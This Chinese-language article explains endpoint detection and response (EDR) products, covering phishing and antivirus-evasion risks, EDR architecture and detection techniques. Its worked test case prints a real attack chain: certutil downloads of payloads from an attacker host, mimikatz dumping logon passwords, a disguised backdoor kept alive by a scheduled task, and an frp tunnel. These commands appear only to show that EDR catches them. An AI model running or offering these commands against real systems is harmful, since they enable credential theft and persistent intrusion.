终端安全面临的挑战

从安全日常管理实践出发，终端安全的常见风险点是钓鱼攻击。因终端业务场景复杂，涉及即时通信软件、邮件等方式，如设置较严苛的拦截规则，则会造成较大的业务影响，且部分钓鱼通道为加密通道，无法在事前进行检测拦截，如钓鱼成功，恶意文件落地，当前传统防病毒方案无法有效防御。常见的绕过方式如下：

1. 免杀绕过：对恶意文件进行加密、加壳、花指令等手段进行免杀，并在投放前通过主流防病毒引擎和文件信誉平台进行验证，躲避主流防病毒引擎基于特征码的文件检查。
2. 白程序利用：通过微软系统自带的程序掩护行踪实现入侵，躲避传统的进程检查，如：svchost、InstallUtil.exe、Msiexec、Rundll32等。
3. 0day漏洞：Payload未公开，防病毒引擎无特征码匹配，无法查杀。

黑客若绕过，并通过攻击手段，成功获取内网终端权限，之后对内网进行全面的渗透，造成显著的安全风险，如图1所示。因当前端点威胁检测能力较弱，在触达检测能力更强的生产环境前，可能长时间潜伏和探测，难以有效的识别攻击者。

图1 典型的黑客攻击路径

因此，将具备更强检测能力的EDR推广到办公终端，以应对当下终端安全的挑战。

EDR概述

终端威胁检测与响应技术（Endpoint Detection And Response，EDR）是一种先进的主动防御技术，它以“预测、防护、检测和响应”的技术体系，全面覆盖终端安全事件的全过程。EDR通过实时监测终端行为，采集运行状态，并利用大数据安全分析、机器学习、沙箱分析和行为分析等技术，提供深度监控、威胁检测、高级威胁分析、调查取证、事件响应处置和追踪溯源等功能，赋予终端强大的主动安全防御能力。

工作原理

终端威胁检测与响应的原理架构如图2所示，包括四部分，分别是防护代理、管理平台、分析中心和安全态势，各部分的功能和作用如下：

防护代理：支持Windows、MAC、Linux，在终端采集并上报运行数据，提取可疑样本到管理平台分析，同时在发现安全威胁时，能够进行响应处置。

管理平台：管理、存储和分发整个系统的安全策略，监视防护代理的运行状态，对防护代理采集的数据进行威胁分析，感知和发现入侵行为，提取入侵攻击的行为特征，对入侵者进行画像，并对入侵攻击行为发起应急响应处理等。

分析平台：分析平台向管理平台提供分析服务，通过对样本进行黑白名单查询、病毒引擎检测、智能沙箱分析、威胁情报分析和专家系统分析后，识别出恶意样本文件，并将识别结果反馈给管理平台，实现恶意代码二次攻击抑制。

安全态势：对EDR采集的安全状态数据、告警日志数据、安全事件信息、任务处置情况进行融合处理、过滤、分析、整编，以GIS、图表等可视化方式展示攻击源、攻击过程、统计排名等态势数据，为应急处置提供决策依据，是EDR宏观掌握终端整体安全状态的重要抓手。

图2 EDR架构

关键技术分析

数据采集技术

采集终端静态和动态数据，静态数据采集部分包括采集操作系统运行的当前状态，如资产信息、服务、端口、进程等。动态信息包括操作系统上发生的各类行为操作，如账户创建、网络访问、文件操作等，记录并采集动作关联的进程、目标文件、网络数据等。

大数据分析技术

将终端采集的各类异构数据进行集中存储和数据分析，结合ATT&CK攻击模型，通过深度学习、关联分析、聚类分析等，发现和识别出终端上隐藏的安全威胁，并发现不满足安全要求和不符合安全规定的终端。

威胁情报技术

结合威胁情报技术，为EDR提供海量的内外部威胁数据、恶意样本数据、黑客组织画像信息等关键数据，可快速识别恶意样本，对威胁告警进行综合研判。

安全取证技术

在安全事件发生后，对发生时和发生后的终端运行状态进行取证，追查攻击行为，重放攻击过程，对攻击事件进行追踪和溯源。

安全实例

钓鱼场景下的小样本攻防测试，恶意样本已做过免杀，点击恶意文件样本

跳板机上线，并从远控端执行下述恶意命令

信息收集

shell whoami shell ipconfig shell wmic process get

凭据窃取

shell certutil -urlcache -split -f "http:// 1xx.xx.xx.xxx:8000/Credential_Access.rar" "C:\Users\Credential_Access.rar" shell C:\Users\public\Rar.exe x "C:\Users\Credential_Access.rar" -op "C:\Users" shell C:\Users\Credential_Access\mimikatz\x64\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

权限维持

shell certutil -urlcache -split -f "http:// 1xx.xx.xx.xxx:8000/backdoor/svchost.exe"  C:\svch0st.exe

shell schtasks /create /F /tn WindowsUpdateCheck /tr "C:\svch0st.exe" /sc HOURLY /mo 5

横向爆破

shell certutil -urlcache -split -f "http:// 1xx.xx.xx.xx:8000/Command_and_Control.rar" "C:\Users\Command_and_Control.rar" shell C:\Users\public\Rar.exe x "C:\Users\Command_and_Control.rar" -op "C:\Users" shell C:\Users\Command_and_Control\frp\frps.exe -c "C:\Users\Command_and_Control\frp\frps.ini"

安全事件聚合，可以看到虽然恶意样本做过免杀，但EDR通过行为分析，依然可以检测并产生高危告警，其后续的所有恶意行为也均可在攻击图谱中发现并处置。

注意事项

为了提高审计效率，EDR的告警降噪工作至关重要。加白规则需贴合匹配告警内容，避免攻击行为绕过。同时，可以根据自身场景添加定制化的IOC规则，但需注意避免匹配正常业务行为，以免造成审计成本增加或业务影响。

自定义行为检测规则（IOC）

EDR的内置规则大多为通用性规则，为提高响应效率，我们可以根据自身场景，添加定制化IOC规则，需注意是否会匹配正常业务行为，明确后方可添加，否则可能会导致审计成本变高或对业务造成影响。

总结

随着信息安全技术的发展，网络攻击已经变得更有针对性、隐蔽性和持久性，终端威胁检测与响应（EDR）技术的出现为新型安全威胁的检测和与防护提供了新思路。EDR在面对为未知威胁攻击、0day漏洞攻击和APT攻击等所表现出的先进性和优越性，已经成为终端安全防护体系的重要组成部分。